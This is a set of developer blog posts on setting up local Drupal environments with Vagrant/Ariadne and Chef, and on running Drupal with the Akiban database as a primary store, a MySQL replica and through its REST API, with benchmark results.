Padraig O'Sullivan

Local Development with Ariadne

2013-05-13T00:00:00-07:00

I recently started a new development position with Blink Reaction so I needed to get somewhat serious about setting up a local Drupal development environment.

Ariadne

I was leaning towards making use of Vagrant for managing local development environments so I can easily switch between different projects or branches. I also believe Vagrant makes it easier to have as close a mirror to production locally as possible.

I discovered a very interesting project from MyPlanet Digital named vagrant-ariadne. Ariadne is a customized implementation of Vagrant and allows for easy deployment of Drupal installation profiles to a local VM. Another nice feature is that it attempts to emulate Acquia’s infrastructure. This is useful as a lot of Blink’s clients are deployed on the Acquia Cloud.

Assuming you have Vagrant, rvm and a ruby environment installed on your workstation, installing Ariadne is pretty straightforward:

j
vagrant gem install vagrant-vbguest vagrant-hostmaster vagrant-librarian
[sudo] gem install librarian rake knife-solo
git clone https://github.com/myplanetdigital/vagrant-ariadne.git
cd vagrant-ariadne
bundle install
bundle exec rake setup

Everything is now configured to boot a virtual box. Ariadne comes with a simple example that can be deployed:

j
project=example vagrant up

Once that command finishes running, the site can be viewed at http://example.dev/ (Ariadne uses vagrant-hostmaster for managing /etc/hosts entries).

A more involved cookbook is a cookbook for deploying the Web Experience Toolkit available on github also. If we wanted to deploy the master branch of this site, we could do:

bundle exec rake "init_project[https://github.com/wet-boew/ariadne-wet-boew-drupal]" project=wet-boew-drupal branch=master vagrant up

And that’s it!

Another nice feature of these deployed environments is that they are configured to allow remote debugging (relevant when setting up an IDE as mentioned later) and the actual site code is shared as an NFS mount. For example, the contents of my /etc/exports file after booting a box with Ariadne looks like:

# VAGRANT-BEGIN: 7ac1cf50-4498-4e49-bd66-edac4a9b2d7e
"/Users/posullivan/vagrant-ariadne/tmp/apt/cache" 33.33.33.10 -mapall=501:20
"/Users/posullivan/vagrant-ariadne/tmp/drush/cache" 33.33.33.10 -mapall=501:20
"/Users/posullivan/vagrant-ariadne/data/html" 33.33.33.10 -mapall=501:20
# VAGRANT-END: 7ac1cf50-4498-4e49-bd66-edac4a9b2d7e

Thus, if I navigate to the ~/vagrant-ariadne/data/html directory or import that in my IDE, I can edit the code deployed on the vagrant box.

Drupal Core from git

Another use I’ve found for ariadne is building a local environment for the latest drupal core. To accomplish this, I created a role file named roles/core.rb with the following contents:

name "core"
description "Install requirements to run Drupal core."
run_list([
  "recipe[mysql::server]",
  "recipe[mysql::client]",
  "recipe[php::module_mysql]",
  "recipe[php::module_curl]",
  "recipe[php::module_gd]",
  "recipe[php::module_apc]",
  "recipe[drush::utils]",
  "recipe[drush::make]",
  "recipe[php::write_inis]",
])
default_attributes({
  :drush => {
    :version => "5.8.0",
  },
  :mysql => {
    :server_debian_password => "root",
    :server_root_password => "root",
    :server_repl_password => "root",
    :bind_address => "127.0.0.1",
    :tunable => {
      :key_buffer => "384M",
      :table_cache => "4096",
    },
  },
})

Next, I created a new cookbook project named core and created a simple default.rb recipe for this cookbook. This recipe looks like:

branch = node['ariadne']['branch']

git "/mnt/www/html/drupal" do
  user "vagrant"
  repository "http://git.drupal.org/project/drupal.git"
  reference branch
  enable_submodules true
  action :sync
  notifies :run, "bash[Installing Drupal...]", :immediately
end

bash "Installing Drupal..." do
  user "vagrant"
  group "vagrant"
  code <<-EOH
    drush -y si \
      --root=/mnt/www/html/drupal \
      --db-url=mysqli://root:root@localhost/drupal \
      --site-name="Drupal Core Installed from Git" \
      --site-mail=vagrant+site@localhost \
      --account-mail=vagrant+admin@locahost \
      --account-name=admin \
      --account-pass=admin
  EOH
end

site = node['ariadne']['host_name'].nil? ? "#{node['ariadne']['project']}.dev" : node['ariadne']['host_name']

web_app site do
  cookbook "ariadne"
  template "drupal-site.conf.erb"
  port node['apache']['listen_ports'].to_a[0]
  server_name site
  server_aliases [ "www.#{site}" ]
  docroot "/mnt/www/html/drupal"
  notifies :reload, "service[apache2]"
end

With all of the above in place, its quite simple to create a local VM based on the latest in the 7.x branch of drupal core:

project=core branch=7.x vagrant up

The above command simply needs to have the branch name modified to deploy a different branch. Once the above command completes, a site will be available at core.dev and I can log in as the admin user using the credentials specified in my cookbook.

Private Repositories

Most repositories for client projects are stored in private repositories. Thankfully, thats not an issue with ariadne. Ariadne uses agent forwarding to forward the host machine’s ssh session into the VM, including keys and passphrases stored by ssh-agent. What this means is that your VM will have the same Git/SSH access that you enjoy on your local machine. I’ve not had a problem checking out code stored in private repositories on bitbucket for example.

IDE

For an IDE, I’ve been an Eclipse user in the past for Java projects I’ve worked on so Aptana seemed like a good fit for my needs at the moment. A few existing articles already exist on configuring Aptana for Drupal development so I’m not going to go into too much details here.

Installation is very straightforward with the binary downloaded from the site. A ruble exists for Drupal so its pretty natural to install that:

git clone git://github.com/arcaneadam/Drupal-Bundle-for-Aptana.git ~/Documents/Aptana Rubles/Drupal-Bundle-for-Aptana

Next item is to configure Aptana to adhere to the Drupal coding standards. I used an existing profile for Aptana that could be imported for this.

The final thing I needed to configure was a debug configuration. To do this, I created a new PHP web page configuration. First, a new PHP server needs to be added. In this example, lets assume I am using the example box I mentioned in the Ariadne section whose hostname is example.dev. The web server configuration dialog when configured with this hostname and appropriate directory for the site root looks like:

Once a PHP server has been added, the rest of the information to fill in for the debug configuration is pretty straightforward as shown below:

I like to select the break at first line option to make sure the debug configuration works correctly.

With this in place, any visit to example.dev will result in the breakpoint being hit.

Conclusion

I’ve still not settled on this combination for my development environment but I was definitely pretty excited upon discovering the Ariadne project. The drawbacks that I see to using Ariadne are: 1) the need to create a cookbook for each project you want to work with, 2) the project is still in beta stage so documentation is fairly lacking (fair enough for a beta project though), and 3) if you are not familiar with chef, using Ariadne may prove challenging (although it provides the perfect excuse to become familiar with chef).

PHPStorm is the IDE that seems to be pretty popular when I ask what other people are using for an editor but given there is a license fee associated with it, I didn’t want to splurge on that just yet. Aptana looks to work just fine for me and satisfies my needs nicely.

Akiban is Now Open Source

2013-04-02T00:00:00-07:00

I’ve written a lot about the work I do for Akiban with Drupal in the past and many people would ask if Akiban was open source software. Well in the last few weeks we actually open sourced our database server. We also have downloads for various platforms such as Windows and OSX besides binary packages for Linux variants.

I wrote previously about how to install Drupal 7 completely on Akiban. You can still follow that post to get up and running except now there is a tiny change for our public repositories:

sudo apt-get install -y python-software-properties
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A
sudo add-apt-repository "deb http://software.akiban.com/apt-public/ lucid main"
sudo apt-get update
sudo apt-get install -y akiban-server postgresql-client

Some of the things included in our open source database are:

spatial indexes
full text indexes (implemented using Lucene)
REST access
nested SQL

We are also working on offering on a service offering for our database server so there will be no need to manage an installation yourself. If you are interested in trying our service in its current beta form, please let me know in the comments or hit me up on twitter and I’d be happy to hook you up or just visit our website. We also have a public mailing list for the Akiban project if you try anything out and have any questions.

Akiban as a MySQL Replica with Drupal 7

2013-01-11T00:00:00-08:00

I previously wrote about how to install Drupal 7 completely on Akiban. However, this is not how our current customers are using us. The vast majority of all Drupal installations currently run on MySQL. What we at Akiban are currently aiming to do is to be deployed as a regular MySQL slave and if there are any queries that are problematic for MySQL, we work with customers to make sure those queries get executed by Akiban (and with a significant performance improvement).

In this post, I wanted to cover how to setup Akiban as a MySQL slave and how a query is typically re-directed to an Akiban server from Drupal. This article is specific to Drupal 7.

First, I setup a regular Drupal install on Ubuntu 12.04 with MySQL 5.5.28. This is going to serve as the master server. To configure replication in MySQL is pretty straightforward. The following needs to be placed in your my.cnf file and MySQL needs to be re-started:

log-bin=mysql-bin
server-id=11

A user needs to be created for replication:

CREATE USER 'repl'@'%' IDENTIFIED BY 'password';
GRANT REPLICATION SLAVE ON *.* TO 'repl'@'%';
FLUSH PRIVILEGES;

Next steps are to take a consistent snapshot of your Drupal schema with mysqldump and capture the output of SHOW MASTER STATUS to get the appropriate binlog co-ordinates.

Next, we need to setup an Akiban MySQL slave. We will use an entirely separate instance for this purpose. First, the software to install on this slave is:

sudo apt-get install -y mysql-client mysql-server
sudo apt-get install -y python-software-properties
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A
sudo add-apt-repository "deb http://software.akiban.com/apt-developer/lucid main"
sudo apt-get update
sudo apt-get install -y akiban-server akiban-adapter-mysql postgresql-client
echo "INSTALL PLUGIN akibandb SONAME 'libakibandb_engine.so'" | mysql -u
root

Issuing the SHOW PLUGINS command on this slave will now show the AkibanDB storage engine. The next step is to now import the mysqldump file taken from the master and configure replication. On the slave server, you need to make sure server-id is set in the my.cnf file. Then to enable replication, a CHANGE MASTER command needs to be issued. An example of what that command might look like is:

CHANGE MASTER TO
  MASTER_HOST = 'ec2-23-20-112-161.compute-1.amazonaws.com',
  MASTER_USER = 'repl',
  MASTER_PASSWORD = 'password',
  MASTER_LOG_FILE = 'mysql-bin.000001',
  MASTER_LOG_POS = 403

Finally, issuing START SLAVE starts up replication. The observant among you will notice all tables are still InnoDB on the slave. We have done nothing to convert any tables to Akiban yet. Before we get to that I want to configure Drupal running on the master server to know about the Akiban slave so it can send queries to it. First, we need to install the Akiban database module in Drupal (the akiban directory should be copied to whatever the appropriate location for your Drupal install is) and the PHP client drivers for PostgreSQL:

sudo apt-get install -y git php5-pgsql
git clone http://git.drupal.org/sandbox/posulliv/1835778.git akiban
cd akiban
git checkout 7.x
cd ../
sudo cp -R akiban /var/www/drupal/includes/database/.

Now, the settings.php file needs to be updated to know about this Akiban server:

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
    'slave' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => 'ec2-23-22-113-161.compute-1.amazonaws.com',
      'port' => '15432',
      'driver' => 'akiban',
      'prefix' => '',
    ),
  ),
);

I would suggest enabling query logging on the Akiban server so you can see read queries being sent to the slave. Query logging can be enabled by modifying the /etc/akiban/config/server.properties file to have these entries:

akserver.querylog.enabled=true
akserver.querylog.filename=/var/log/akiban/queries.log
akserver.querylog.exec_time_threshold=0

All queries issued against Akiban will now be logged to the /var/log/akiban/queries.log file since we set the query execution time threshold to 0. Akiban needs to re-started for this to take effect.

By default, very few queries from Drupal core are sent to a slave database. The search module is probably the best module to test with to see queries being sent to Akiban. The search module can be accessed from your Drupal site by going to http://your.ip.address/drupal/?q=search

First, we need to convert those tables to Akiban, otherwise any search will now fail since no tables have been converted to Akiban yet. To convert these tables to Akiban, we simply issue the following in MySQL:

STOP SLAVE;
ALTER TABLE search_total ENGINE=AkibanDB;
ALTER TABLE search_index ENGINE=AkibanDB;
ALTER TABLE node ENGINE=AkibanDB;
ALTER TABLE search_index ADD CONSTRAINT `__akiban_fk_00` FOREIGN KEY (sid) REFERENCES node (nid);
ANALYZE TABLE node;
ANALYZE TABLE search_index;
ANALYZE TABLE search_total;
START SLAVE;

The relevant tables are now converted to Akiban. Now, try searching content for a keyword. If everything is working correctly, queries should start appearing in the query log on the Akiban server when issuing content searches.

This is obviously a pretty simple example but now its pretty trivial to send more queries to Akiban. Just change the database target, convert the appropriate tables to Akiban on the slave, and away you go!

If there is anything you would like more information on, please let me know in the comments or hit me up on twitter and I’d be more than happy to dig in. We also have a public mailing list for the Akiban project and I’d encourage anyone who’s interested to subscribe to that list and let us know how we’re doing! Finally, I’ll be presenting on this topic at drupalcamp MA on January 19th and I am also delivering a joint webinar with Acquia in February on this topic.

Testing an Alternate Field SQL Storage Module

2013-01-08T00:00:00-08:00

After my post yesterday testing the field storage layer, a commentator pointed out an alternate SQL storage module that does not create a revision table for each field. Naturally, I had to try this out to see how what kind of performance was possible with this approach.

The average throughput numbers I observed using this module are shown in the table below.

Environment	Average Throughput
Default MySQL	2892 nodes / minute
Default PostgreSQL	2313 nodes / minute
Tuned MySQL	4730 nodes / minute
Tuned PostgreSQL	2464 nodes / minute

The image below shows the results graphically for different environments I tested. The Y axis is throughput (node per minute) with the X axis specifying the CSV file (corresponding to a MLB year) being imported.

That’s a pretty big improvement over the numbers I got in my original test. We still are not approaching the 8000 nodes per minute that is possible with a tuned MySQL instance and MongoDB for field storage but at about 5000 nodes per minute, we are getting somewhat close. It does beg the question of whether the performance benefits of MongoDB for field storage are worth it when we can get somewhat close using this module and a site’s original database system?

I would be interested in suggestions for read benchmarks from the community for different field storage backends so I can attempt to gain more insight into this question for myself.

Field Storage Tests with Drupal 7

2013-01-07T00:00:00-08:00

I had some spare time this weekend and decided to do some tests with the field storage layer. I really just wanted to re-produce the results Moshe Weitzman published a while back. I also wanted to see what the best results I could get were.

Environment Details

The software and versions used for testing were:

EC2 EBS backed Large instance (8GB of memory) in the US-EAST availability zone
Ubuntu 12.04 (ami-fd20ad94 as listed in official ubuntu AMI’s)
MySQL 5.5.28
PostgreSQL 9.2
MongoDB 2.0.4
Drupal 7.17
Drush 5.1
Migrate 2.5

I ran tests against both MySQL and PostgreSQL with default settings for both but I also ran tests where I modified the configuration of both systems to be optimized for writes.

The configuration options I specified for MySQL when tuning it were:

innodb_flush_log_at_trx_commit=0
innodb_doublewrite=0
log-bin=0
innodb_support_xa=0
innodb_buffer_pool_size=6G
innodb_log_file_size=512M

The configuration options I specified for PostgreSQL when tuning it were:

fsync = off
synchronous_commit = off
wal_writer_delay = 10000ms
wal_buffers = 16MB
checkpoint_segments = 64
shared_buffers = 6GB

Dataset

The dataset used for the tests comes from the migrate_example_baseball module that comes as part of the migrate module. This dataset contains a box score from every Major League Baseball game from the year 2000 to the year 2009. Each year’s data is contained in CSV file. Different components of the box score are saved in fields hence stressing field storage a lot.

Results

Average throughput numbers for the various configurations I tested are shown in the table below.

Environment	Average Throughput
Default MySQL	1932 nodes / minute
Default PostgreSQL	1649 nodes / minute
Tuned MySQL	3024 nodes / minute
Tuned PostgreSQL	1772 nodes / minute
Default MySQL with MongoDB	4609 nodes / minute
Default PostgreSQL with MongoDB	4810 nodes / minute
Tuned MySQL with MongoDB	7671 nodes / minute
Tuned PostgreSQL with MongoDB	5911 nodes / minute

Conclusion

Its pretty obvious from glancing at the results above that using MongoDB for field storage results in the best throughput. Tuned MySQL using MongoDB for field storage gave me the best results. This is consistent with what Moshe reported in his original article as well.

What was very interesting to me was the PostgreSQL numbers. The overhead of having a table per field with the default SQL field storage seems to be very high with PostgreSQL. Its interesting to see how much better an optimized PostgreSQL does when using MongoDB for field storage.

After performing these tests, one experiment I really want to try now is to create a field storage module for PostgreSQL that uses the JSON data type included in the 9.2 release. Hopefully, I will get some spare time in the coming week or two to work on that.

Making Drupal more RESTful with Akiban

2012-12-17T00:00:00-08:00

Last week, I published an article on how to install Drupal 7 with Akiban as the backend database. Today, I wanted to briefly show off our REST API using the schema that is created with a standard install of Drupal 7 core.

First, I installed the devel module and generated some data since a bare bones install with no data would not be much fun. This server is running on a publically available EC2 instance too so if you are interested in trying these examples out yourself at home, feel free to do so! I’ll leave the EC2 instance up and running for the remainder of 2012 but if anyone wants to try the examples out and the instance seems unavailable, please let me know and I’ll fire it up again for you.

For the first few examples, I’m going to use curl since its available on nearly every system (including OSX). Lets first get the version of the Akiban we are going to be interacting with:

$ curl -X GET -H "Content-Type: application/json" http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/version
[
{"server_name":"Akiban Server","server_version":"1.4.4.2451"}
]
$

Lets continue this trend of a few simple examples to get started. I want to know the list of schemas on this server I am interacting with:

$ curl -X GET -H "Content-Type: application/json" http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/information_schema.schemata
[
{"schema_name":"drupal","schema_owner":null,"default_character_set_name":null,"default_collation_name":null},
{"schema_name":"information_schema","schema_owner":null,"default_character_set_name":null,"default_collation_name":null},
{"schema_name":"sqlj","schema_owner":null,"default_character_set_name":null,"default_collation_name":null},
{"schema_name":"sys","schema_owner":null,"default_character_set_name":null,"default_collation_name":null},
{"schema_name":"test","schema_owner":null,"default_character_set_name":null,"default_collation_name":null}
]
$

Lets try a Drupal specific example next. Our REST API allows you to retrieve an entire table group in 1 request. So let’s say I wanted to get all information for a certain user (I pretty-printed the JSON in the output below so if you run this you will need to format the output):

$ curl -X GET -H "Content-Type: application/json" http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/drupal.users/1
[
    {
        "uid": 1,
        "name": "posulliv",
        "pass": "$S$DPV31LZyFWJmJ.Fcj6IRyjb/RFMyQQtE87gsad7cavgnH3fw0GHA",
        "mail": "posullivan@akiban.com",
        "theme": "",
        "signature": "",
        "signature_format": null,
        "created": 1355345142,
        "access": 1355762571,
        "login": 1355345211,
        "status": 1,
        "timezone": "America/New_York",
        "language": "",
        "picture": 0,
        "init": "posullivan@akiban.com",
        "data": "YjowOw==",
        "drupal.authmap": [],
        "drupal.sessions": [
            {
                "uid": 1,
                "sid": "jq57PowPwDK1CuKBpC56oqt_PsbwWNF4av97BuQqr6I",
                "ssid": "",
                "hostname": "75.147.9.1",
                "timestamp": 1355762574,
                "cache": 0,
                "session": "YmF0Y2hlc3xhOjE6e2k6MTtiOjE7fWF1dGhvcml6ZV9maWxldHJhbnNmZXJfaW5mb3xhOjE6e3M6MzoiZnRwIjthOjU6e3M6NToidGl0bGUiO3M6MzoiRlRQIjtzOjU6ImNsYXNzIjtzOjE1OiJGaWxlVHJhbnNmZXJGVFAiO3M6NDoiZmlsZSI7czo3OiJmdHAuaW5jIjtzOjk6ImZpbGUgcGF0aCI7czoyMToiaW5jbHVkZXMvZmlsZXRyYW5zZmVyIjtzOjY6IndlaWdodCI7aTowO319YXV0aG9yaXplX29wZXJhdGlvbnxhOjQ6e3M6ODoiY2FsbGJhY2siO3M6Mjg6InVwZGF0ZV9hdXRob3JpemVfcnVuX2luc3RhbGwiO3M6NDoiZmlsZSI7czozNToibW9kdWxlcy91cGRhdGUvdXBkYXRlLmF1dGhvcml6ZS5pbmMiO3M6OToiYXJndW1lbnRzIjthOjM6e3M6NzoicHJvamVjdCI7czo1OiJkZXZlbCI7czoxMjoidXBkYXRlcl9uYW1lIjtzOjEzOiJNb2R1bGVVcGRhdGVyIjtzOjk6ImxvY2FsX3VybCI7czozNzoiL3RtcC91cGRhdGUtZXh0cmFjdGlvbi1kOWU4MTUzOS9kZXZlbCI7fXM6MTA6InBhZ2VfdGl0bGUiO3M6MTQ6IlVwZGF0ZSBtYW5hZ2VyIjt9bWVzc2FnZXN8YToxOntzOjU6ImVycm9yIjthOjI6e2k6MDtzOjI3NToiPGVtIGNsYXNzPSJwbGFjZWhvbGRlciI+V2FybmluZzwvZW0+OiBhcnJheV9rZXlfZXhpc3RzKCkgZXhwZWN0cyBwYXJhbWV0ZXIgMiB0byBiZSBhcnJheSwgbnVsbCBnaXZlbiBpbiA8ZW0gY2xhc3M9InBsYWNlaG9sZGVyIj50aGVtZV9pbWFnZV9mb3JtYXR0ZXIoKTwvZW0+IChsaW5lIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPjYwNTwvZW0+IG9mIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPi92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYzwvZW0+KS4iO2k6MTtzOjI3NToiPGVtIGNsYXNzPSJwbGFjZWhvbGRlciI+V2FybmluZzwvZW0+OiBhcnJheV9rZXlfZXhpc3RzKCkgZXhwZWN0cyBwYXJhbWV0ZXIgMiB0byBiZSBhcnJheSwgbnVsbCBnaXZlbiBpbiA8ZW0gY2xhc3M9InBsYWNlaG9sZGVyIj50aGVtZV9pbWFnZV9mb3JtYXR0ZXIoKTwvZW0+IChsaW5lIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPjYwNTwvZW0+IG9mIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPi92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYzwvZW0+KS4iO319"
            }
        ],
        "drupal.shortcut_set_users": [],
        "drupal.users_roles": [
            {
                "uid": 1,
                "rid": 3
            }
        ],
        "drupal.watchdog": [
            {
                "wid": 160662,
                "uid": 1,
                "type": "php",
                "message": "JXR5cGU6ICFtZXNzYWdlIGluICVmdW5jdGlvbiAobGluZSAlbGluZSBvZiAlZmlsZSku",
                "variables": "YTo2OntzOjU6IiV0eXBlIjtzOjc6Ildhcm5pbmciO3M6ODoiIW1lc3NhZ2UiO3M6NjI6ImFycmF5X2tleV9leGlzdHMoKSBleHBlY3RzIHBhcmFtZXRlciAyIHRvIGJlIGFycmF5LCBudWxsIGdpdmVuIjtzOjk6IiVmdW5jdGlvbiI7czoyMzoidGhlbWVfaW1hZ2VfZm9ybWF0dGVyKCkiO3M6NToiJWZpbGUiO3M6NDU6Ii92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYyI7czo1OiIlbGluZSI7aTo2MDU7czoxNDoic2V2ZXJpdHlfbGV2ZWwiO2k6NDt9",
                "severity": 4,
                "link": "0",
                "location": "aHR0cDovL2VjMi01MC0xOS0yOC0yNy5jb21wdXRlLTEuYW1hem9uYXdzLmNvbS9kcnVwYWwv",
                "referer": "aHR0cDovL2VjMi01MC0xOS0yOC0yNy5jb21wdXRlLTEuYW1hem9uYXdzLmNvbS9kcnVwYWwv",
                "hostname": "24.61.45.238",
                "timestamp": 1355406786
            }
        ]
    }
]
$

We also support multi-get so you can retrieve a number of table groups in a single REST API call. For example, lets say I want to get information on 2 users:

$ curl -X GET -H "Content-Type: application/json" "http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/drupal.users/11467;10503"
[
    {
        "uid": 11467,
        "name": "clibriprofr",
        "pass": "",
        "mail": "clibriprofr@default",
        "theme": "",
        "signature": "",
        "signature_format": null,
        "created": 1355360324,
        "access": 0,
        "login": 0,
        "status": 1,
        "timezone": null,
        "language": "und",
        "picture": 11463,
        "init": "",
        "data": null,
        "drupal.authmap": [],
        "drupal.sessions": [],
        "drupal.shortcut_set_users": [],
        "drupal.users_roles": [],
        "drupal.watchdog": []
    },
    {
        "uid": 10503,
        "name": "uuslosuwr",
        "pass": "",
        "mail": "uuslosuwr@default",
        "theme": "",
        "signature": "",
        "signature_format": null,
        "created": 1355360324,
        "access": 0,
        "login": 0,
        "status": 1,
        "timezone": null,
        "language": "und",
        "picture": 10499,
        "init": "",
        "data": null,
        "drupal.authmap": [],
        "drupal.sessions": [],
        "drupal.shortcut_set_users": [],
        "drupal.users_roles": [],
        "drupal.watchdog": []
    }
]
$

Our REST API also supports aribtrary SQL queries being executed and results being returned as JSON. Lets try a simple example first:

$ curl -X GET -H "Content-Type: application/json" "http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/query?q=select%20count(*)%20from%20drupal.comment"
[
{"_SQL_COL_1":252462}
]
$

Another example of executing arbitrary SQL queries through our REST API with a more complex query follows. The query we will use for this example is:

SELECT c.* 
FROM   drupal.comment c 
       INNER JOIN drupal.node n 
               ON n.nid = c.nid 
WHERE  ( c.status = 1 ) 
       AND ( n.status = 1 ) 
ORDER  BY c.created DESC, 
          c.cid DESC 
LIMIT  10 offset 0

Running this query through our REST API and the result (again, nicely formatted) looks like:

curl -X GET -H "Content-Type: application/json" "http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/query?q=SELECT%20c.*%20FROM%20drupal.comment%20c%20INNER%20JOIN%20drupal.node%20n%20ON%20n.nid%20=%20c.nid%20WHERE%20(c.status%20=%201)%20AND%20(n.status%20=%201)%20ORDER%20BY%20c.created%20DESC,%20c.cid%20DESC%20LIMIT%2010%20OFFSET%200"
[
    {
        "cid": 304562,
        "pid": 0,
        "nid": 93450,
        "uid": 1,
        "subject": "this is a test comment",
        "hostname": "75.147.9.1",
        "created": 1355418376,
        "changed": 1355418376,
        "status": 1,
        "thread": "01/",
        "name": "posulliv",
        "mail": "",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304561,
        "pid": 304558,
        "nid": 93451,
        "uid": 3636,
        "subject": "Defui Enim Gemino Luctus Occuro Paulatim",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "01.00/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304560,
        "pid": 0,
        "nid": 93451,
        "uid": 3633,
        "subject": "Abdo Ea Sudo Veniam Vulputate",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "03/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304559,
        "pid": 0,
        "nid": 93451,
        "uid": 3651,
        "subject": "Defui Euismod Letalis Nisl Utinam Vicis",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "02/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304558,
        "pid": 0,
        "nid": 93451,
        "uid": 3657,
        "subject": "Similis Te",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "01/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304557,
        "pid": 0,
        "nid": 93448,
        "uid": 3630,
        "subject": "Loquor Modo Ut",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "02/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304556,
        "pid": 0,
        "nid": 93448,
        "uid": 3648,
        "subject": "Abico Conventio Elit Quis",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "01/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304555,
        "pid": 0,
        "nid": 93447,
        "uid": 3646,
        "subject": "Dolor Immitto Metuo Veniam",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "04/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304554,
        "pid": 304553,
        "nid": 93447,
        "uid": 3633,
        "subject": "Defui Et Pertineo Premo Usitas",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "01.00.00/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304553,
        "pid": 304550,
        "nid": 93447,
        "uid": 3655,
        "subject": "Amet Gravis Inhibeo Roto Torqueo",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "01.00/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    }
]
$

Finally, I’d like to mention we have a client for node.js that can be used with our REST interface. To get information on the schemas in this server and the grouping in the drupal schema, some code using this client would look as follows:

#!/usr/bin/env coffee

ak = require('./lib/akiban_rest.js')
_  = require('underscore')

log = (msg) ->
  () ->
    console.log("========")
    console.log(msg)
    console.log("--------")
    unless arguments[0].error
      _(arguments[0].body).forEach (x) ->
        console.log(x)
    console.log(arguments) if arguments[0].error
    console.log("--------")

x = new ak.AkibanClient()

x.version(log('the server version is'))
x.schemata(log('and these are all the schemata'))
x.groups('drupal', log('all groups in the drupal schema'))

The above can be run with the coffee command like so: coffee drupal.coffee.

To retrieve a certain node with this client, the code would look like:

#!/usr/bin/env coffee

ak = require('./lib/akiban_rest.js')
_  = require('underscore')

log = (msg) ->
  () ->
    console.log("========")
    console.log(msg)
    console.log("--------")
    unless arguments[0].error
      _(arguments[0].body).forEach (x) ->
        console.log(x)
    console.log(arguments) if arguments[0].error
    console.log("--------")

x = new ak.AkibanClient()
x.get 'drupal', 'node', 2054, (res) -> log('retrieving nid 2054')(res)

Running the above example results in output like:

$ coffee drupal.coffee 
========
retrieving nid 2054
--------
{ nid: 2054,
  vid: 2054,
  type: 'page',
  language: 'und',
  title: 'Eros Iriure Pertineo Refoveo Roto Utrum',
  uid: 3661,
  status: 1,
  created: 1355369527,
  changed: 1355369527,
  comment: 0,
  promote: 1,
  sticky: 0,
  tnid: 0,
  translate: 0,
  'drupal.comment': [],
  'drupal.history': [],
  'drupal.node_access': [],
  'drupal.node_comment_statistics': 
   [ { nid: 2054,
       cid: 0,
       last_comment_timestamp: 1355369527,
       last_comment_name: null,
       last_comment_uid: 3656,
       comment_count: 0 } ],
  'drupal.node_revision': 
   [ { nid: 2054,
       vid: 2056,
       uid: 1,
       title: 'Ad Si Suscipere',
       log: '',
       timestamp: 1355369527,
       status: 1,
       comment: 0,
       promote: 1,
       sticky: 0 } ],
  'drupal.search_node_links': [] }
--------

Thats about it for this post showing off our REST access. As usual, comments are very much welcome and feel free to ping me on twitter if you would like to learn more about Akiban.

Installing Drupal 7 with Akiban

2012-12-14T00:00:00-08:00

Dries recently published a post highlighting some work we’ve done with a particular customer in the Acquia cloud. What I wanted to cover in this post was to how to perform an installation of Akiban and get a Drupal 7 site up and running on Akiban. This post only covers a fresh installation; later posts will cover how to do migration and augmenting an existing site instead of running it entirely on Akbian.

This post is specific to Ubuntu but Akiban runs on CentOS too (as well as OSX and Windows which we have installers for). If people would like to see information specific to those platforms, please let me know in the comments.

First things first, lets install Akiban!

sudo apt-get install -y python-software-properties
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A
sudo add-apt-repository "deb http://software.akiban.com/apt-developer/ lucid main"
sudo apt-get update
sudo apt-get install -y akiban-server postgresql-client

